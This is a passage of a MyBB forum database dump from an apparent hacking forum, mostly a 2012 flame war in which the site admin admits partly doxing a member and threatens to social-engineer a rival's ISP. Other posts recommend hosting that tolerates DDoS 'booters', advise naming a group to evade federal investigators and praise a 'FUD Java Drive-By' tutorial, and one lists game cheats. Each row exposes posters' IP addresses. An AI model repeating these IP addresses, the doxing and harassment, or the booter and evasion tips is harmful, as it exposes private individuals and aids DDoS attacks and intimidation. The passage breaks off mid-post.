`visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3990', '747', '3975', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349745877', '[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5bf923d4f684ceb4e28bd0d96596e7a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3991', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '222', 'Exposé', '1349750375', 'Itzipod nothing against you but you went against LH and sided with AnarchyForums. We want 100% dedicated members on LH', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '204865d2e401cfeee6bcc724616b523a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3992', '774', '0', '19', '[Junk]What is expected of you!', '0', '222', 'Exposé', '1349750481', 'Here in the fearless group it is expected that you release as much social engineering content as you can here and on the forum. I expect you to be active on the forum and not do anything stupid. I will be posting some cool tuts for you guys and hopefully we can get some good shit here :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '04ae3dee3119cfcfdc90bb097cef6b84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3993', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '4', 'Triple H', '1349751455', 'I just checked out Anarchy, I thought that Anarchy was a cool forum because I thought LH won\'t create low class rivals but I was wrong. Jok3r why did you create a rivalry with a site that is on even on the page on your own? The owner is a pussy and can\'t keep content that we have.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0d039ef6fe19754b1397de3433ee5587', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3994', '198', '1426', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '4', 'Triple H', '1349751523', '[quote=\'Jacob\' pid=\'1426\' dateline=\'1346503750\'] I need a good free host for this. Anybody have one? [/quote] Sorry for the late reply. Try xhostfire or xhostding.biz, ixam-hosting doesn\'t allow Booters but give them a try they have good servers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec608c22f4c20bab5d0fa761fa4f74f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3995', '772', '3947', '58', 'RE: Group Request', '0', '4', 'Triple H', '1349751697', 'I like the idea. +1 for Rave and how about adding these suggestions? 1. Make the group name very common such as unknown hackers, hackers, the blackhats etc because then it will be hard to find the group which will made it hard for the feds to find this group just incase if someone did something. 2. Maybe make the group invite only so this group only has real hackers and not skids.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9d79ca59bc7e678f50957f831ce8a8d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3996', '747', '3990', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349751953', '[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\'] [quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out. [/quote] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [quote=\'??????????¢™\' pid=\'3961\' dateline=\'1349734471\'] [Anarchys] is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid. [/quote] Actually, I had nothing to do with the private messages sent out. Someone else had sent those. Ironically, your site\'s members were the first to spam, as several of our users claimed to have received spam messages from your site.', '108.171.103.234', '1823172586', '0', '0', '246', '1349752374', '1', 'ae7a24b80e68c54a92496edc5ea54e2f', '0', '1349752374'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3997', '775', '0', '75', 'GTA San Andreas Cheats', '0', '4', 'Triple H', '1349752103', '[color=#1E90FF][font=Tahoma][size=large][align=center][b]Grand Theft Auto: San Andres Cheats[/b][/align][/size][/font][/color] [b]Infinite health[/b] While playing the game, press Down, X, Right, Left, Right, R1, Right, Down, Up, Triangle. If you entered the code correctly, a message will appear. Note: Falls, explosions, drowning, and vehicle rundowns are still harmful. [b]Infinite ammunition[/b] While playing the game, press L1, R1, Square, R1, Left, R2, R1, Left, Square, Down, L1(2). If you entered the code correctly, a message will appear. You no longer need to reload, and will have unlimited ammunition for each new weapon that is picked up. Repeat this code to disable its effect. [b]Weapons (tier 1)[/b] While playing the game, press R1, R2, L1, R2, Left, Down, Right, Up, Left, Down, Right, Up. If you entered the code correctly, a message will appear. The least powerful weapons in each category and rocket launcher will be unlocked. To get infinite ammunition for this or the other weapons tiers, repeatedly enable the code until no ammunition number appears beneath the gun pictures. Note: Enabling this code will cause your street creds to drop in points. You can check your creds in the stats menu at the pause screen. If you are in the negative, you are a Playa-Hater. [b]Weapons (tier 2)[/b] While playing the game, press R1, R2, L1, R2, Left, Down, Right, Up, Left, Down(2), Left. If you entered the code correctly, a message will appear. The moderate powered weapons in each category will be unlocked, including the flame thrower and sniper rifle. Note: Enabling this code will cause your street creds to drop in points. You can check your creds in the stats menu at the pause screen. If you are in the negative, you are a Playa-Hater. [b]Weapons (tier 3)[/b] While playing the game, press R1, R2, L1, R2, Left, Down, Right, Up, Left, Down(3). If you entered the code correctly, a message will appear. The high powered weapons in each category will be unlocked, including the chainsaw and lock-on bazooka. Note: Enabling this code will cause your street creds to drop in points. You can check your creds in the stats menu at the pause screen. If you are in the negative, you are a Playa-Hater. [b]Hitman level in all weapons[/b] While playing the game, press Down, Square, X, Left, R1, R2, Left, Down(2), L1(3) to receive dual wield, etc. If you entered the code correctly, a message will appear. [b]Health, armor, and money[/b] While playing the game, press R1, R2, L1, X, Left, Down, Right, Up, Left, Down, Right, Up. If you entered the code correctly, a message will appear. Note: You must enter this code multiple times to increase your total money. If this code is enabled when your car is smoking or damaged it will get repaired. During various missions where you are in a car while someone else drives and you shoot (for example, Reuniting The Families), enabling this code will instead blow the car up, failing the mission. [b]Pimping mission completed[/b] While playing the game, press Right, L2(2), Down, L2, Up(2), L2, R2. If you entered the code correctly, a message will appear. You can now get money from prostitutes instead of paying them. [b]Taxi missions completed[/b] While playing the game, press Up, Left(2), Down, Circle, Square, L1(2), L2, R1, R2. If you entered the code correctly, a message will appear. All taxis will now have nitrous. [b]Raise wanted level[/b] While playing the game, press R1(2), Circle, R2, Left, Right, Left, Right, Left, Right. If you entered the code correctly, a message will appear. [b]Six star wanted level[/b] While playing the game, press Circle, Right, Circle, Right, Left, Square, X, Down. If you entered the code correctly, a message will appear. [b]Lower wanted level[/b] While playing the game, press R1(2), Circle, R2, Up, Down, Up, Down, Up, Down. If you entered the code correctly, a message will appear. [b]Wanted level never increases[/b] While playing the game, press Circle, Right, Circle, Right, Left, Square, Triangle, Up. If you entered the code correctly, a message will appear. Note: This will not remove any wanted level stars you may already have. [b]Bounty on your head[/b] While playing the game, press Down, Up(2), Up, X, R2, R1, L2(2). If you entered the code correctly, a message will appear. Repeat this code to disable its effect. [b]Maximum vehicle skills[/b] While playing the game, press Square, L2, X, R1, L2(2), Left, R1, Right, L1(3). If you entered the code correctly, a message will appear. [b]Maximum respect[/b] While playing the game, press L1, R1, Triangle, Down, R2, X, L1, Up, L2(2), L1(2). If you entered the code correctly, a message will appear. Note: When starting a new game or when you have a very low respect level, enable the \"Maximum respect\" code twice and your total respect level will be green. [b]Maximum sex appeal[/b] While playing the game, press Circle, Triangle(2), Up, Circle, R1, L2, Up, Triangle, L1(3). If you entered the code correctly, a message will appear. [b]Maximum lung capacity[/b] While playing the game, press Down, Left, L1, Down(2), R2, Down, L2, Down. If you entered the code correctly, a message will appear. [b]Maximum muscle[/b] While playing the game, press Triangle, Up(2), Left, Right, Square, Circle, Left. If you entered the code correctly, a message will appear. Note: You will not be able to workout at any of the gyms. [b]Maximum fat[/b] While playing the game, press Triangle, Up(2), Left, Right, Square, Circle, Down. If you entered the code correctly, a message will appear. Note: This will reduce the muscle stat to zero. [b]No fat or muscle[/b] While playing the game, press Triangle, Up(2), Left, Right, Square, Circle, Right. If you entered the code correctly, a message will appear. [b]No hunger[/b] While playing the game, press Square, L2, R1, Triangle, Up, Square, L2, Up, X. If you entered the code correctly, a message will appear. [b]Super punches[/b] While playing the game, press Up, Left, X, Triangle, R1, Circle(3), L2. If you entered the code correctly, a message will appear. Punch pedestrians to send them flying further away; however, they can also super punch. Repeat this code to disable its effect.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9ef35ff90e588fdf8e6ac0f0e3df91f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3998', '747', '3996', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349752479', '[quote=\'Anarchy Forums\' pid=\'3996\' dateline=\'1349751953\'] [quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\'] [quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out. [/quote] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [/quote] Ight lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum? Now if you got scammed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything. You revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6808edcdf350505c35f342b2e7d88df5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3999', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349753135', '[quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\'] [quote=\'[Anarchy Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\'] [quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\'] [quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out. [/quote] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [/quote] Ight lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum? Now if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything. You revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have. [/quote] I never made an agreement not to disclose your private messages, sorry if you were mistaken. You shouldn\'t make threats or statements that you aren\'t comfortable with being made public. As far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. I won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you. If you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? Explain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader. As far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions.', '108.171.103.234', '1823172586', '0', '0', '246', '1349753180', '1', '93cc0181b336a26ddc9538718c4c783b', '0', '1349753180'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4000', '747', '3996', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '61', 'NXK', '1349753175', '[quote=\'The Anarchist\' pid=\'3996\' dateline=\'1349751953\'] [quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\'] [quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out. [/quote] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [quote=\'??????????¢™\' pid=\'3961\' dateline=\'1349734471\'] [Anarchys] is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid. [/quote] Actually, I had nothing to do with the private messages sent out. Someone else had sent those. Ironically, your site\'s members were the first to spam, as several of our users claimed to have received spam messages from your site. [/quote] If you didn\'t care about your IP why are you still on a VPN?', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8e99371bfc0fb6f540695038c7be61d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4001', '747', '4000', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349753270', '[quote=\'NXK\' pid=\'4000\' dateline=\'1349753175\'] [quote=\'The Anarchist\' pid=\'3996\' dateline=\'1349751953\'] [quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\'] [quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out. [/quote] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [quote=\'??????????¢™\' pid=\'3961\' dateline=\'1349734471\'] [Anarchys] is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid. [/quote] Actually, I had nothing to do with the private messages sent out. Someone else had sent those. Ironically, your site\'s members were the first to spam, as several of our users claimed to have received spam messages from your site. [/quote] If you didn\'t care about your IP why are you still on a VPN? [/quote] My location is blocked on several websites. Let me rephrase that. I care about my IP address, I just don\'t care if you guys have it. :cool: My reasoning? Only a pre-teen makes jokes about another person\'s mother. I don\'t mind if he has my IP, as there is nothing he\'d be able to do with it.', '108.171.103.234', '1823172586', '0', '0', '246', '1349753457', '1', '5dd5f5cbfec8e3cc5b2a0ca583028383', '0', '1349753457'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4002', '747', '3999', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349753495', '[quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\'] [quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\'] [quote=\'[[A. Forums] Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\'] [quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\'] [quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\'] Just because I suggested it, doesn\'t mean I used it. + Why the fuck would you post that dox of me online? [/quote] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out. [/quote] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [/quote] Ight lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum? Now if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything. You revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have. [/quote] I never made an agreement not to disclose your private messages, sorry if you were mistaken. You shouldn\'t make threats or statements that you aren\'t comfortable with being made public. As far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. I won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you. If you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? Explain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader. As far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions. [/quote] Oh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you? I did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame. If you don\'t like me or my forum then leave. Actually I can do anything with your IP because Brazil is not a hard country to SE.', '72.231.24.165', '1223104677', '1', '0', '1', '1349753560', '1', 'e60ac5bb79f34a3b3cc4e47d713741bb', '0', '1349753560'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4003', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '1', 't3h jok3r', '1349753617', 'I didn\'t even know you run a website. What software did you use?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5e3563aa96142b2c57b9ba185d50c78', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4004', '713', '3640', '12', 'RE: How To Make A FUD Java Drive-By', '0', '61', 'NXK', '1349753683', 'This might come in handy sometime, Thanks for this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd19873d09ab98923bd806ff0a7012f6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4005', '747', '4002', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349753806', '[quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\'] [quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\'] [quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\'] [quote=\'[[A. Forums] Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\'] [quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\'] I created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. I have Anarchists\' original and VPN IP so you can check it out. [/quote] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [/quote] Ight lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum? Now if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything. You revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have. [/quote] I never made an agreement not to disclose your private messages, sorry if you were mistaken. You shouldn\'t make threats or statements that you aren\'t comfortable with being made public. As far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. I won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you. If you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? Explain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader. As far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions. [/quote] Oh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you? I did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame. If you don\'t like me or my forum then leave. Actually I can do anything with your IP because Brazil is not a hard country to SE. [/quote] Apparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it. Why are you being so honest now? Not too long ago you said you had nothing to do with it. In fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it. Why bother lying if you can\'t keep your story straight? This thread is about you, and your terrible qualities as a leader, not my site. As far as contacting my ISP, are you honestly that invested in doing something to me? Ironically enough, I have other means of internet, and you would have to learn an entire language to contact them (or risk looking like an idiot with a translator). (Also, our top poster does NOT have 3 posts)', '108.171.103.234', '1823172586', '0', '0', '246', '1349753934', '1', 'ac3a890fbbfaf37a2e55a6af01cf668d', '0', '1349753934'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4006', '747', '4005', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349754068', '[quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\'] [quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\'] [quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\'] [quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\'] [quote=\'[[A. Forums] Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\'] My IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language. The fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport. However, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader. [/quote] Ight lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum? Now if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything. You revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have. [/quote] I never made an agreement not to disclose your private messages, sorry if you were mistaken. You shouldn\'t make threats or statements that you aren\'t comfortable with being made public. As far as sca-mming? Yeah - it\'s a new 